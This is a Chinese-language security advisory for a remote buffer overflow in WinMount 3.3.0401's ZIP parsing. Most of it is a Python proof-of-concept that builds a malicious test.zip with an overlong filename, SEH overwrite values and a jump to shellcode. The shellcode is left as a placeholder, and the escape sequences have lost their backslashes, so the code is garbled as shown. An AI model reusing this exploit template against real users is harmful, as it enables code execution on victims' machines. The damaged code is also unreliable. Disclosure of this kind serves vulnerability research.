WinMount 3.3.0401 ZIP文件解析远程溢出漏洞

来源：岁月联盟编辑：猪蛋儿时间：2010-04-28

影响版本:
WinMount 3.3.0401

漏洞描述:
BUGTRAQ ID: 39557

WinMount是一款免费的Windows小工具，具有压缩、解压、浏览压缩和挂载DVD、CD、虚拟机硬盘镜像等功能。

用户受骗使用WinMount加载了带有超长文件名的zip文件就可以触发缓冲区溢出，导致执行任意代码。

<*参考

Lufeng Li （lilf@neusoft.com）
http://marc.info/?l=bugtraq&m=127170296402601&w=2

测试方法:

Poc:
import os

sploitfile="test.zip"
ldf_header =('x50x4Bx03x04x14x00x00'
'x00x08x00xB7xACxCEx34x00x00x00'
'x00x00x00x00x00x00x00x00x00x00'
'xd0xff'
'x00x00x00')
cdf_header = ("x50x4Bx01x02x14x00x14"
"x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00x00"
"xd0xff"
"x00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")
eofcdf_header = ("x50x4Bx05x06x00x00x00"
"x00x01x00x01x00"
"xfexffx00x00"
"xeexffx00x00"
"x00x00")
print "[+] Preparing payloadn"
size=65484
junk='A'*420
nseh='x89x8ax8bx8c'
seh='x84x5bxacx8d'
junk_='A'*33
jumpto='x05x12x11x46x2dx11x11x46x50x46xacxe4'#make eax point to shellcode
and jump to shellcode shellcode=("the shellcode here will be changed into
unicode")#encode by alpha2 junk__='B'*80
last='C'*(size-420-len(nseh+seh+junk_+jumpto+junk__+shellcode))
payload=junk+nseh+seh+junk_+jumpto+junk__+shellcode+last+".wav"
evilzip = ldf_header+payload+cdf_header+payload+eofcdf_header
print "[+] Removing old zip filen"
os.system("del "+sploitfile)
print "[+] Writing payload to filen"
fobj=open(sploitfile,"w",0)
fobj.write(evilzip)
print "generate zip file "+(sploitfile)
fobj.close()
print '[+] Wrote %d bytes to file sploitfilen'%(len(evilzip))
print "[+] Payload length :%d n"%(len(payload))